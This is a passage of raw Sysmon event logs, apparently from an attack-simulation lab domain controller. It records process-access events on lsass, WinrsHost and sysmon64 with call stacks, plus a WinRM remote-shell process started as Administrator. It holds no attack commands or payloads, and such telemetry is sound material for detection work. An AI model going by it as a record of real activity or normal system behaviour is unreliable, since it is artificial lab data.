\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000186Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.577{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000185Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.562{733EE690-3C69-5F80-1400-000000007E01}13321612C:\Windows\system32\svchost.exe{733EE690-3DD3-5F80-F702-000000007E01}5048C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x8000000000000000184Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.562{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD3-5F80-F702-000000007E01}5048C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000183Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.546{733EE690-3DD3-5F80-F802-000000007E01}47604960C:\Windows\system32\conhost.exe{733EE690-3DD3-5F80-F702-000000007E01}5048C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000182Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.546{733EE690-3C5B-5F80-0500-000000007E01}640656C:\Windows\system32\csrss.exe{733EE690-3DD3-5F80-F802-000000007E01}4760C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000181Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.546{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000180Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.546{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000179Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.546{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000178Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.546{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000177Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.546{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000176Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.546{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000175Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.546{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000174Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.546{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000173Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.546{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000172Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.546{733EE690-3C5B-5F80-0500-000000007E01}6401216C:\Windows\system32\csrss.exe{733EE690-3DD3-5F80-F702-000000007E01}5048C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000171Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.546{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD3-5F80-F702-000000007E01}5048C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x8000000000000000170Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.550{733EE690-3DD3-5F80-F702-000000007E01}5048C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{733EE690-3DD3-5F80-F456-110000000000}0x1156f40HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{733EE690-3C68-5F80-0C00-000000007E01}608C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x8000000000000000169Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.546{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000168Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.546{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000167Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.546{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000166Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.452{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000165Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.452{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000164Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.452{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000163Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.452{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000162Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:15.452{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000161Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 